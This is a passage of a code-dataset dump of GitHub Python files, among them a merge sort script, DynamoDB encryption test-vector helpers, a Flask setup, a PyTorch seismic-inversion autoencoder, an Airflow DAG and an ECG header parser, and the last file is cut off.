self._scan_for_serializers()\n\n for cls in model.__mro__:\n if cls in self.serializers_by_model_class:\n serializer_class = self.serializers_by_model_class[cls]\n return serializer_class(model)\n\n\nserializer_registry = SerializerRegistry()\n","repo_name":"wagtail/wagtail-transfer","sub_path":"wagtail_transfer/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":6642,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"72"} +{"seq_id":"16550530790","text":"import random\n\ndef Merge(A, i, j, m):\n for k in A[i : m]:\n while m < j and k > A[m]:\n A[i] = A[m]\n i = i + 1\n m = m + 1\n A[i] = k\n i = i + 1\n\ndef MergeSortSlice(A, i, j):\n if j - i > 1:\n m = (i + j) // 2\n MergeSortSlice(A, i, m)\n MergeSortSlice(A, m, j)\n Merge(A, i, j, m)\n \ndef MergeSort(A):\n MergeSortSlice(A, 0, len(A))\n\nA = []\nfor i in range(12):\n A.append(random.randint(-20, 20))\n\nprint(A) \nMergeSort(A)\nprint(A)\n\n","repo_name":"Vibulan/sortingPython","sub_path":"MergeSort.py","file_name":"MergeSort.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14404567234","text":"import base64\nimport codecs\nimport json\nimport os\nfrom decimal import Decimal\n\nfrom boto3.dynamodb.types import Binary\n\nfrom dynamodb_encryption_sdk.identifiers import CryptoAction\nfrom dynamodb_encryption_sdk.structures import AttributeActions\n\n_ATTRIBUTE_TEST_VECTOR_FILE_TEMPLATE = os.path.join(\n os.path.abspath(os.path.dirname(__file__)), \"..\", \"vectors\", \"{mode}_attribute.json\"\n)\n_MATERIAL_DESCRIPTION_TEST_VECTORS_FILE = os.path.join(\n os.path.abspath(os.path.dirname(__file__)), \"..\", \"vectors\", \"material_description.json\"\n)\n_STRING_TO_SIGN_TEST_VECTORS_FILE = os.path.join(\n os.path.abspath(os.path.dirname(__file__)), \"..\", \"vectors\", \"string_to_sign.json\"\n)\n\n\ndef decode_value(value, transform_binary=False): # noqa: C901\n def _decode_string(_value):\n return _value\n\n def _decode_number(_value):\n return \"{0:f}\".format(Decimal(_value))\n\n def _decode_binary(_value):\n raw = base64.b64decode(_value)\n if transform_binary:\n return Binary(raw)\n return raw\n\n def _binary_sort_key(x):\n if transform_binary:\n return x.value\n return x\n\n def _passthrough_sort_key(x):\n return x\n\n def _decode_set(_value, member_decode, key_func=_passthrough_sort_key):\n decoded_members = []\n for member in _value:\n decoded_members.append(member_decode(member))\n return sorted(decoded_members, key=key_func)\n\n def _decode_binary_set(_value):\n return _decode_set(_value, _decode_binary, _binary_sort_key)\n\n def _decode_string_set(_value):\n return _decode_set(_value, _decode_string)\n\n def _decode_number_set(_value):\n return _decode_set(_value, _decode_number)\n\n def _decode_list(_value):\n decoded_members = []\n for member in _value:\n decoded_members.append(_decode_complex_value(member))\n return decoded_members\n\n def _decode_map(_value):\n decoded_value = {}\n for member_key, member_value in _value.items():\n decoded_value[member_key] = _decode_complex_value(member_value)\n return decoded_value\n\n _decode_mapping = {\n \"S\": _decode_string,\n \"B\": _decode_binary,\n \"SS\": _decode_string_set,\n \"BS\": _decode_binary_set,\n \"L\": _decode_list,\n \"M\": _decode_map,\n \"N\": _decode_number,\n \"NS\": _decode_number_set,\n }\n\n def _decode_complex_value(_value):\n key, item = list(_value.items())[0]\n transform = _decode_mapping.get(key, None)\n if transform is None:\n return {key: item}\n return {key: transform(item)}\n\n return _decode_complex_value(value)\n\n\ndef attribute_test_vectors(mode):\n filepath = _ATTRIBUTE_TEST_VECTOR_FILE_TEMPLATE.format(mode=mode)\n with open(filepath, encoding=\"utf-8\") as f:\n vectors = json.load(f)\n for vector in vectors:\n yield (decode_value(vector[\"attribute\"]), base64.b64decode(codecs.encode(vector[\"serialized\"], \"utf-8\")))\n\n\ndef material_description_test_vectors():\n with open(_MATERIAL_DESCRIPTION_TEST_VECTORS_FILE, encoding=\"utf-8\") as f:\n vectors = json.load(f)\n for vector in vectors:\n yield (vector[\"material_description\"], decode_value({\"B\": codecs.encode(vector[\"serialized\"], \"utf-8\")}))\n\n\nACTION_MAP = {\n \"encrypt\": CryptoAction.ENCRYPT_AND_SIGN,\n \"sign\": CryptoAction.SIGN_ONLY,\n \"nothing\": CryptoAction.DO_NOTHING,\n}\n\n\ndef string_to_sign_test_vectors():\n with open(_STRING_TO_SIGN_TEST_VECTORS_FILE, encoding=\"utf-8\") as f:\n vectors = json.load(f)\n for vector in vectors:\n item = {key: decode_value(value[\"value\"]) for key, value in vector[\"item\"].items()}\n bare_actions = {key: ACTION_MAP[value[\"action\"]] for key, value in vector[\"item\"].items()}\n attribute_actions = AttributeActions(default_action=CryptoAction.DO_NOTHING, attribute_actions=bare_actions)\n yield (\n item,\n vector[\"table\"],\n attribute_actions,\n base64.b64decode(codecs.encode(vector[\"string_to_sign\"], \"utf-8\")),\n )\n","repo_name":"aws/aws-dynamodb-encryption-python","sub_path":"test/functional/functional_test_vector_generators.py","file_name":"functional_test_vector_generators.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"72"} +{"seq_id":"71120568232","text":"#!/usr/bin/env python3.7\nfrom flask import Flask\nfrom flask_socketio import SocketIO\nfrom flask_login import LoginManager\n\napp = Flask(__name__)\napp.config['CORS_HEADERS'] = 'Content-Type'\napp.config['ENV'] = 'development'\napp.secret_key = \"any random string\"\nsocketio = SocketIO(app)\nlogin = LoginManager(app)\nlogin.login_view = 'user_routes.login'","repo_name":"bjellesma/chatchord","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38517762117","text":"from string import ascii_uppercase as compound_names\nfrom enum import Enum\n\nclass EffectType(Enum):\n\tRESTORE = 1\n\tDEPLETE = 2\n\tBUFF = 3\n\tDEBUFF = 4\n\nclass Effect():\n\tdef __init__(self, stat, signature, effecttype):\n\t\tself.stat = stat\n\t\t'''\n\t\tEach effect's signature is 3 compounds (names), \n\t\tand implies equal amounts of each. Basically a bit-\n\t\tvector with exactly three 1's.\n\n\t\tEffects that have only compounds that occur in nature means\n\t\teating raw ingredients can potentially yield that effect\n\t\twith high potency.\n\t\t'''\n\t\tself.signature = signature\n\t\tself.vector = self.effectvector()\n\t\tself.effecttype = effecttype\n\n\tdef effectvector(self):\n\t\tresult = [1 if i in self.signature else 0 \\\n\t\t\tfor i in compound_names]\n\t\treturn result\n\nalleffects = {\n\t'+hp' : Effect('hp', \t\t\t\t['A', 'D', 'M'],\n\t\tEffectType.RESTORE),\n\t'+speed' : Effect('speed', \t\t\t['C', 'O', 'S'],\n\t\tEffectType.BUFF),\n\t'+defense' : Effect('defense', \t\t['J', 'M', 'T'],\n\t\tEffectType.BUFF),\n\t'+spdefense' : Effect('spdefense', \t['E', 'G', 'N'],\n\t\tEffectType.BUFF),\n\t'+attack' : Effect('attack', \t\t['B', 'F', 'W'],\n\t\tEffectType.BUFF),\n\t'+spattack' : Effect('spattack', \t['E', 'K', 'X'],\n\t\tEffectType.BUFF),\n\t'+heat' : Effect('heat', \t\t\t['C', 'U', 'V'],\n\t\tEffectType.BUFF),\n\n\t'-hp' : Effect('hp', \t\t\t\t['F', 'H', 'P'],\n\t\tEffectType.DEPLETE),\n\t'-speed' : Effect('speed', \t\t\t['D', 'I', 'N'],\n\t\tEffectType.DEBUFF),\n\t'-defense' : Effect('defense', \t\t['I', 'O', 'W'],\n\t\tEffectType.DEBUFF),\n\t'-spdefense' : Effect('spdefense', \t['J', 'R', 'T'],\n\t\tEffectType.DEBUFF),\n\t'-attack' : Effect('attack', \t\t['H', 'K', 'S'],\n\t\tEffectType.DEBUFF),\n\t'-spattack' : Effect('spattack', \t['D', 'G', 'P'],\n\t\tEffectType.DEBUFF),\n\t'-heat' : Effect('heat', \t\t\t['B', 'Q', 'X'],\n\t\tEffectType.DEBUFF),\n\t\n\t'invis' : Effect('invisibility', \t['L', 'V', 'X'],\n\t\tEffectType.BUFF)\n}\n\t","repo_name":"mkdir-not-war/alchemy-demo","sub_path":"effects.py","file_name":"effects.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23776812381","text":"'''\nSwap Nodes in Pairs\n\nGiven a linked list, swap every two adjacent nodes and return its head.\n\n \n\nExample 1:\n\nInput: head = [1,2,3,4]\nOutput: [2,1,4,3]\n\nExample 2:\n\nInput: head = []\nOutput: []\n\nExample 3:\n\nInput: head = [1]\nOutput: [1]\n\n \n\nConstraints:\n\n The number of nodes in the list is in the range [0, 100].\n 0 <= Node.val <= 100\n\n \nFollow up: Can you solve the problem without modifying the values in the list's nodes? (i.e., Only nodes themselves may be changed.)\n'''\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nclass Solution:\n def swapPairs(self, head: ListNode) -> ListNode:\n if head and head.next:\n next_start = head.next.next\n head.next.next = head\n head = head.next\n else:\n return head\n head.next.next = self.swapPairs(next_start)\n return head\n\n#from leetcode\nclass Solution(object):\n def swapPairs(self, head):\n if not head or not head.next: return head\n new_start = head.next.next\n head, head.next = head.next, head\n head.next.next = self.swapPairs(new_start)\n return head\n\n#fromm leetcode\nclass Solution(object):\n def swapPairs(self, head):\n if not head or not head.next:\n return head\n second = head.next\n head.next = self.swapPairs(second.next)\n second.next = head\n return second\n\ndef build_ll(head):\n if not head: return head\n start = ListNode(head[0])\n curr = start\n for i in range(1, len(head)):\n curr.next = ListNode(head[i])\n curr = curr.next\n return start\n\ndef print_ll(head):\n curr = head\n ref = []\n while curr:\n ref.append(curr)\n print(curr.val, sep=\"==>\", end=\" \")\n curr = curr.next\n return ref\n\nhead = [1,2,3,4]\n# Output: [2,1,4,3]\nhead = []\n# Output: []\nhead = [1]\n# Output: [1]\nprint('Input = {}'.format(head))\nstart = build_ll(head)\nprint('LL')\nref = print_ll(start)\nprint(ref)\nprint()\ns = Solution()\nswapped = s.swapPairs(start)\nprint('After pair swap')\nswap_ref = print_ll(swapped)\nprint(swap_ref)\nprint()\n","repo_name":"jomesh18/Leetcode","sub_path":"Recursion/swap_pairs_ll.py","file_name":"swap_pairs_ll.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"168258812","text":"import traceback\n\nimport dill\nfrom insights_sandbox.protocol import Commands, Error, Okay, Results\n\n\nclass Controller:\n \"\"\"\n Drives a state machine that controls a ``Runner`` via the\n setup and process methods of a ``RunnerAdapter``.\n\n Arguments:\n setup (function): Function that handles the SETUP command's payload.\n process (function): Function that handles archive processing.\n send (function): Used to send Responses.\n recv (function): Used to get commands with their payloads.\n\n \"\"\"\n\n def __init__(self, setup, process, send, recv):\n self.handlers = {\n \"starting\": Starting(self, setup),\n \"processing\": Processing(self, process),\n }\n self._send = send\n self._recv = recv\n self._state = \"starting\"\n\n def run(self):\n # Let the sender know we're ready.\n self.send(Okay())\n while self._state != \"stopping\":\n cmd, payload = self.recv()\n result = self.handlers[self._state].run(cmd, payload)\n self.send(result)\n self._state = \"stopped\"\n\n def send(self, msg):\n if msg is not None:\n code, payload = msg\n self._send([code, dill.dumps(payload)])\n\n def recv(self):\n cmd, payload = self._recv()\n return cmd, dill.loads(payload)\n\n def transition_to(self, state):\n self._state = state\n\n\nclass State:\n def __init__(self, controller, action):\n self._controller = controller\n self._action = action\n\n def run(self, cmd, payload):\n if cmd == Commands.STOP:\n self.transition_to(\"stopping\")\n return Okay()\n\n try:\n return self.handle(cmd, payload)\n except Exception:\n self.transition_to(\"stopping\")\n return Error(traceback.format_exc())\n\n def handle(self, cmd, payload):\n raise NotImplementedError()\n\n def transition_to(self, state):\n self._controller.transition_to(state)\n\n\nclass Starting(State):\n def handle(self, cmd, payload):\n if cmd == Commands.SETUP:\n self._action(payload)\n self.transition_to(\"processing\")\n return Okay()\n\n raise Exception(\"Invalid Command.\")\n\n\nclass Processing(State):\n def handle(self, cmd, payload):\n if cmd == Commands.PROCESS:\n return Results(self._action(payload))\n\n raise Exception(\"Invalid Command\")\n","repo_name":"RedHatInsights/insights-sandbox","sub_path":"insights_sandbox/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4503263661","text":"from numpy.random import seed\n\nseed(1)\nimport os\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.layers import BatchNormalization\nfrom tensorflow.keras.optimizers import RMSprop, Adam, SGD\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.models import load_model\nimport numpy as np\nimport pandas as pd\nfrom sklearn import svm, metrics, datasets\nimport pickle\n\nbase_dir = os.path.join(os.path.dirname(__file__), '../data')\ntrain_dir = os.path.join(base_dir, 'train')\nvalidation_dir = os.path.join(base_dir, 'validation')\ntest_dir = os.path.join(base_dir, 'test')\n\n# Directory with our training class1 pictures\ntrain_blank_dir = os.path.join(train_dir, 'Blank')\n\n# Directory with our training class2 pictures\ntrain_cancel_dir = os.path.join(train_dir, 'Cancelled')\n\n# Directory with our training class3 pictures\ntrain_hand_dir = os.path.join(train_dir, 'Handwritten')\n\n# Directory with our training class4 pictures\ntrain_print_dir = os.path.join(train_dir, 'Printed')\n\n# Directory with our validation class1 pictures\nvalidation_blank_dir = os.path.join(validation_dir, 'Blank')\n\n# Directory with our validation class2 pictures\nvalidation_cancel_dir = os.path.join(validation_dir, 'Cancelled')\n\n# Directory with our validation class3 pictures\nvalidation_hand_dir = os.path.join(validation_dir, 'Handwritten')\n\n# Directory with our validation class4 pictures\nvalidation_print_dir = os.path.join(validation_dir, 'Printed')\n\n# Directory with our test pictures\ntest_class_dir = os.path.join(test_dir, 'allclasses')\n\n'''\n# get shape of feature matrix\nprint('Feature matrix shape is: ', X_train.shape)\n\n# define standard scaler\nss = StandardScaler()\n# run this on our feature matrix\nbees_stand = ss.fit_transform(X_train)\n\npca = PCA(n_components=500)\n# use fit_transform to run PCA on our standardized matrix\nbees_pca = ss.fit_transform(bees_stand)\n# look at new shape\nprint('PCA matrix shape is: ', bees_pca.shape)\n'''\n\n\ntrain_test_filename = \"../data_kfold/dll_{}.pkl\"\nfor k_fold in [0,1,2]:\n print(\"k-fold number : {}\".format(k_fold))\n with open(train_test_filename.format(k_fold), 'rb') as file:\n pickle_model = pickle.load(file)\n X_train = pickle_model.get('X_tr')\n Y_train = pickle_model.get('y_tr')\n X_val = pickle_model.get('X_te')\n Y_val = pickle_model.get('y_te')\n print((X_train.shape,Y_train.shape),(X_val.shape,Y_val.shape))\n \n for each_model_k in [0,1,2]:\n model = load_model('../model/mdl_wts_{}.hdf5'.format(each_model_k))\n\n pred = model.predict(X_val)\n Y_pred = np.argmax(pred, axis=1)\n Y_val_num = np.argmax(Y_val, axis=1)\n print(\"Classification report for - \\nval_data--{} & model_k--{}:\\n{}\\n\".format(k_fold, each_model_k, metrics.classification_report(Y_val_num, Y_pred)))","repo_name":"munaAchyuta/image_classification","sub_path":"kfold_DL_test.py","file_name":"kfold_DL_test.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25507119904","text":"import torch.nn as nn\nimport torch\nfrom utils import *\n\n# from torchfwi import Fwi\n# from PyFWI.torchfwi import Fwi\n\n\nclass SubBlock(nn.Module):\n def __init__(self, in_channels, out_channels, stride):\n super(SubBlock, self).__init__()\n self.conv = self.conv = nn.Sequential(\n nn.Conv2d(in_channels=in_channels, out_channels=out_channels,\n kernel_size=3, stride=stride, padding=1,\n bias=True,\n # padding_mode=\"reflect\" # Help to reduce the artifacts\n ),\n nn.BatchNorm2d(out_channels),\n nn.LeakyReLU(0.2)\n )\n def forward(self, x):\n return self.conv(x)\n \n \nclass Block(nn.Module):\n def __init__(self, in_channels, out_channels, stride, operation, final_shape=None):\n super(Block, self).__init__()\n layers = [\n SubBlock(in_channels=in_channels,\n out_channels=out_channels,\n stride=stride),\n SubBlock(in_channels=out_channels,\n out_channels=out_channels,\n stride=stride)\n ]\n if operation == \"down\":\n layers.append(\n nn.MaxPool2d(kernel_size=2)\n )\n elif operation == \"up\":\n if not final_shape:\n layers.append(\n nn.Upsample(scale_factor=2, mode=\"bilinear\")\n )\n else:\n layers.append(\n nn.Upsample(final_shape, mode=\"bilinear\")\n )\n \n self.layers = nn.Sequential(*layers)\n \n def forward(self, x):\n out = self.layers(x)\n return out\n \n \nclass Encoder(nn.Module):\n def __init__(self, batch_size, in_channels,\n n_blocks, nt, nr,\n final_size):\n super(Encoder, self).__init__()\n self.nr = nr\n self.nt = nt\n \n self.batch_size = batch_size\n \n layers = []\n self.out_channels = [2 ** i for i in range(n_blocks + 1)]\n # print(self.out_channels)\n \n for layer_idx in range(n_blocks):\n layers.append(\n Block(in_channels=self.out_channels[layer_idx] * in_channels,\n out_channels=self.out_channels[layer_idx + 1] * in_channels,\n stride=1, operation=\"down\"\n )\n )\n self.conv_layers = nn.Sequential(*layers)\n \n self._set_fc_in_features(in_channels)\n # print(fc_in_features, final_size) \n # Fully connected layer is used to bring the results of conv layers to\n # an pproopriate size for upsacling. \n self.final_size = final_size\n \n self.final = nn.Sequential(\n nn.Linear(\n in_features=self.fc_in_features, \n out_features=self.final_size \n )\n )\n \n def _set_fc_in_features(self, in_channels):\n self.fc_in_features =self.batch_size * in_channels * self.out_channels[-1] \\\n * torch.div(self.nt, self.out_channels[-1], rounding_mode=\"floor\")\\\n * torch.div(self.nr, self.out_channels[-1], rounding_mode=\"floor\")\n \n def _reshape_input(self, in_channels:int):\n input_layer = self.conv_layers[0].layers[0].conv[0] \n stride = input_layer.stride\n out_channels = input_layer.out_channels\n \n # self._set_fc_in_features(in_channels)\n old_block = self.conv_layers[0].layers[0].conv[0]\n if old_block.in_channels == in_channels:\n pass\n else:\n self.conv_layers[0].layers[0].conv[0] = \\\n nn.Conv2d(in_channels=in_channels, out_channels=out_channels,\n kernel_size=3, stride=stride, padding=1,\n bias=True,\n )\n self.conv_layers[0].layers[0].conv[0].bias = nn.Parameter(old_block.bias)\n if old_block.in_channels > in_channels:\n self.conv_layers[0].layers[0].conv[0].weight = nn.Parameter(old_block.weight[:,:in_channels, ...])\n \n else:\n self.conv_layers[0].layers[0].conv[0].weight[:, :in_channels, ...] = nn.Parameter(old_block.weight)\n \n def _reshape_final(self, \n fc_in_features: int,\n final_size: int):\n old_in_features = self.final[0].in_features\n if old_in_features == fc_in_features:\n pass\n else:\n self.final = nn.Sequential(\n nn.Linear(\n in_features=fc_in_features, \n out_features=final_size \n )\n )\n \n \n def forward(self, x):\n out = self.conv_layers(x)\n # out = nn.Flatten()(out)\n out = out.view(-1)\n # print(out.shape)\n out = self.final(out)\n \n return out\n \n \nclass Decoder(nn.Module):\n def __init__(self, batch_size,\n initial_shape: Tuple, \n final_shape: Tuple,\n n_blocks,\n m_min, m_max,\n final_out_channels=1\n ):\n \n super(Decoder, self).__init__() \n #Shape to reconstruct output of the encoder\n self._set_initial_shape(initial_shape) \n self.batch_size = batch_size\n self.m_max = m_max\n self.m_min = m_min\n finalize = None\n \n layers = []\n self.out_channels = [2 ** i for i in range(n_blocks + 1)]\n \n for layer_idx in range(n_blocks):\n finalize = final_shape if layer_idx== n_blocks-1 else None\n \n layers.append(\n Block(in_channels=self.out_channels[layer_idx],\n out_channels=self.out_channels[layer_idx + 1],\n stride=1, operation=\"up\",\n final_shape=finalize\n )\n )\n \n self.conv_layers = nn.Sequential(*layers)\n self.final = nn.Sequential(\n nn.Conv2d(in_channels=self.out_channels[-1],\n out_channels=final_out_channels, \n kernel_size=3, padding=1, stride=1,\n bias=True\n ),\n nn.Sigmoid(),\n \n )\n\n def _set_initial_shape(self, initial_shape_decoder: Tuple):\n self.initial_shape = initial_shape_decoder\n \n def _set_finale_shape(self, final_shape_decoder: Tuple):\n self.conv_layers[-1].layers[2].size = final_shape_decoder\n \n def forward(self, x):\n x = x.reshape(self.batch_size, 1, self.initial_shape[0], self.initial_shape[1])\n out = self.conv_layers(x)\n out = self.final(out)\n out = self.m_min + out * (self.m_max - self.m_min)\n return out\n \n\nclass Autoencoder(nn.Module):\n def __init__(self, batch_size, in_channels,\n n_blocks_encoder, n_blocks_decoder,\n final_size_encoder, initial_shape_decoder,\n nt, nr, final_spatial_shape,\n m_min, m_max,\n final_out_channels=1 \n ):\n super(Autoencoder, self).__init__()\n self.encoder = Encoder(batch_size=batch_size, in_channels=in_channels,\n n_blocks=n_blocks_encoder, \n nt=nt, nr=nr, final_size=final_size_encoder)\n self.decoder = Decoder(batch_size=batch_size, initial_shape=initial_shape_decoder,\n final_shape=final_spatial_shape, n_blocks=n_blocks_decoder, \n m_min=m_min, m_max=m_max, \n final_out_channels=final_out_channels)\n \n def _reshape_encoder(self, trained_encoder, d_obs: torch.Tensor):\n new_in_channels: int = d_obs.shape[1]\n \n final_size_encoder = self.encoder.final_size\n \n self.encoder = trained_encoder\n self.encoder._reshape_input(in_channels=new_in_channels)\n\n a = self.encoder.conv_layers(d_obs)\n self.encoder._reshape_final(fc_in_features=a.view(-1).shape[0],\n final_size=final_size_encoder)\n \n def _reshape_decoder(self, trained_decoder, \n decoder_initial_shape: Tuple,\n decoder_final_shape: Tuple):\n \n self.decoder = trained_decoder\n self.decoder._set_initial_shape(decoder_initial_shape)\n self.decoder._set_finale_shape(decoder_final_shape)\n \n def reshape(self, trained_autoencoder,\n d_obs: torch.Tensor,\n decoder_initial_shape: Tuple,\n decoder_final_shape: Tuple\n ):\n self._reshape_encoder(\n trained_autoencoder.encoder,\n d_obs=d_obs)\n \n self._reshape_decoder(\n trained_autoencoder.decoder,\n decoder_initial_shape=decoder_initial_shape,\n decoder_final_shape=decoder_final_shape\n )\n\n \n def forward(self, x):\n out = self.encoder(x)\n out = self.decoder(out)\n return out\n \n\nclass Physics_deepwave(nn.Module):\n def __init__(self, dh, dt, src,\n src_loc, rec_loc, rp_properties=None):\n super(Physics_deepwave, self).__init__()\n self.dh = dh\n self.dt = dt\n self.src = src\n self.src_loc = src_loc\n self.rec_loc = rec_loc\n rp_properties = rp_properties\n \n def forward(self, vp):\n \n out = deepwave.scalar(vp, self.dh, self.dt,\n source_amplitudes=self.src,\n source_locations=self.src_loc,\n receiver_locations=self.rec_loc)\n taux = out[-1]\n return taux.permute(0, 2, 1).unsqueeze(0)\n \n\nclass Physics_cufwi(nn.Module):\n def __init__(self, dh, dt, src,\n src_loc, rec_loc, rp_properties=None):\n super(Physics_cufwi, self).__init__()\n \n src_loc = src_loc.squeeze()\n temp = src_loc[:, 0].clone()\n src_loc[:, 0] = src_loc[:, 1]\n src_loc[:, 1] = temp\n src_loc = src_loc.squeeze()\n\n rec_loc = rec_loc[0, ...]\n temp = rec_loc[:, 0].clone()\n rec_loc[:, 0] = rec_loc[:, 1]\n rec_loc[:, 1] = temp\n\n self.dh = dh\n self.dt = dt\n # src = src.to(device=\"cpu\")\n self.src = src[0, 0, :].to(device=\"cpu\")\n self.src_loc = src_loc.to(device=\"cpu\")\n self.rec_loc = rec_loc.to(device=\"cpu\")\n rp_properties = rp_properties\n \n def forward(self, vp):\n print(self.src_loc)\n wave = AcousticWave(grid_spacing=self.dh, \n dt=self.dt, accuracy=4,\n source_amplitude=self.src, \n src_loc=self.src_loc,\n rec_loc=self.rec_loc,\n pml_width=20, chpr=99, \n save_wave=False)\n out = wave(vp.to(device=\"cpu\"))\n\n taux = out[-1]\n return taux.permute(2, 0, 1).unsqueeze(0)\n \n \nif __name__ == \"__main__\":\n import torch \n nb = 64\n nc = 6\n nz= 90\n nt = 150\n nx = 100\n \n data = torch.rand(nb, nc, nz, nx)\n sub_block = SubBlock(in_channels=nc,\n out_channels=2*nc,\n stride=1)\n data_shape = data.shape\n print(f\"Shape of data is: {data_shape}\")\n \n sub_block_data_shape = sub_block(data).shape\n assert sub_block_data_shape == (data_shape[0], data_shape[1]*2, data_shape[2], data_shape[3]),\\\n f\"SubBlock must only halves the number of channels! So, size should be {(data_shape[0], data_shape[1]*2, data_shape[2], data_shape[3])}, \"\\\n f\"but got {sub_block_data_shape}\"\n ","repo_name":"AmirMardan/pinn_fwi","sub_path":"networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":12040,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"12773660681","text":"from pendulum import datetime\nfrom airflow.models import DAG\nfrom airflow import Dataset\nfrom pandas import DataFrame\nfrom astro import sql as aql\nfrom astro.sql.table import Table\n\n# Define constants for interacting with external systems\nSNOWFLAKE_CONN_ID = \"snowflake_default\"\nSNOWFLAKE_ORDERS = \"orders_table\"\n\n# Define datasets\norders_table_dataset = Table(conn_id=SNOWFLAKE_CONN_ID, name=SNOWFLAKE_ORDERS)\n#orders_table_dataset = Dataset(\"astro://snowflake_default@?table=orders_table\")\n\n# Define a function for transforming tables to dataframes\n@aql.dataframe\ndef transform_dataframe(df: DataFrame):\n amounts = df.loc[:, \"amount\"]\n print(\"Total amount:\", amounts.sum())\n return amounts.sum()\n\nwith DAG(\n dag_id=\"consumer_dag_1\",\n start_date=datetime(2019, 1, 1),\n schedule=[orders_table_dataset],\n catchup=False,\n):\n\n # Transform the reporting table into a dataframe\n sum_orders = transform_dataframe(\n Table(\n name=SNOWFLAKE_ORDERS,\n conn_id=SNOWFLAKE_CONN_ID,\n )\n )","repo_name":"astronomer/live-sdk-datasets","sub_path":"dags/consumer_dag_1.py","file_name":"consumer_dag_1.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"42709731870","text":"n = int(input(\"No of items : \"))\r\nm = int(input(\"Capacity of bag : \"))\r\np = list(map(int, input(\"Enter profits : \").split()))\r\nw = list(map(int, input(\"Enter weights : \").split()))\r\nq = {p[i]:w[i] for i in range(n)}\r\nd = {}\r\nres = 0\r\nprint(\"\\nWeights are their Ratio's: \")\r\nprint(\"-\"*10)\r\nfor i in range(n):\r\n d[p[i]/w[i]] = p[i]\r\n print(w[i], \" \", round(p[i]/w[i],2))\r\n\r\nd = {k : v for k,v in sorted(d.items(), reverse= True)}\r\nfor k,v in d.items():\r\n if(q[v] <= m):\r\n m = m - q[v]\r\n res += v\r\n else:\r\n res += ((m/ q[v])*v)\r\n break\r\nprint(\"\\nThe Maximum Profit: {}\".format(res))\r\n","repo_name":"2002anonymous/DAA","sub_path":"fractional_greedy.py","file_name":"fractional_greedy.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3216722829","text":"from changes.api.serializer import Crumbler, register\nfrom changes.vcs.base import RevisionResult\n\n\n@register(RevisionResult)\nclass RevisionCrumbler(Crumbler):\n def crumble(self, instance, attrs):\n return {\n 'id': instance.id,\n 'sha': instance.id, # Having both id and sha is a bit distasteful. We should try to fix this.\n 'message': instance.message,\n 'author': None, # We don't return author information\n 'dateCreated': instance.author_date,\n 'dateCommitted': instance.committer_date,\n }\n","repo_name":"dropbox/changes","sub_path":"changes/api/serializer/vcs/revisionresult.py","file_name":"revisionresult.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":758,"dataset":"github-code","pt":"72"} +{"seq_id":"570507774","text":"\nimport scipy.io\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\nimport pathlib as pl\nimport numpy as np\nimport random\n\n\n#=====================================================================================================\n\ndef read_heafile(file_name):\n # Function to read a .hea file and return its content as a list of strings\n # Open the .hea file\n with open(file_name, 'r') as file:\n # Read the content of the .hea file\n hea_content = file.readlines()\n\n return hea_content\n\n#====================================================================================================\n\ndef create_array(hea_content):\n ID = hea_content[0].strip().split()[0]\n \n # Extract 'Age' from .hea file content\n age_info = hea_content[13].strip().split()\n age = int(age_info[2]) if len(age_info) > 2 and age_info[2].isdigit() else 0\n \n # Extract 'Gender' from .hea file content\n gender = hea_content[14].strip().split()[2] if len(hea_content) > 14 else 'Unknown'\n \n # Extract 'Abnormality' from .hea file content\n abnormality = hea_content[15].strip().split()[2] if len(hea_content) > 15 else 'Unknown'\n \n return [ID, age, gender, abnormality]\n\n#===================================================================================================\ndef create_dataframes(training_directory):\n dataframes = {}\n\n subdirectories = [subdir for subdir in pl.Path(training_directory).iterdir() if subdir.is_dir()]\n \n for source_folder_path in subdirectories:\n source_folder_name = source_folder_path.name\n columns = ['ID', 'Age', 'Gender', 'Abnormality']\n source_dataframe = pd.DataFrame(columns=columns)\n patient_data = {} # To collect patient information\n \n for subdir in source_folder_path.iterdir():\n if subdir.is_dir():\n data_dir = pl.Path(subdir)\n header_files = list(data_dir.glob('*.hea'))\n\n for header_file in header_files:\n header_path = data_dir.joinpath(header_file.name)\n hea_content = read_heafile(header_path)\n patient_info = create_array(hea_content)\n patient_id = patient_info[0]\n \n # Collect patient information\n for i, column_name in enumerate(['Age', 'Gender', 'Abnormality']):\n patient_data.setdefault(patient_id, {})[column_name] = patient_info[i + 1]\n \n # Create a list of patient data dictionaries\n patient_rows = []\n for patient_id, info in patient_data.items():\n row = {'ID': patient_id, 'Age': info.get('Age'), 'Gender': info.get('Gender'), 'Abnormality': info.get('Abnormality')}\n patient_rows.append(row)\n \n # Concatenate patient data into the dataframe\n source_dataframe 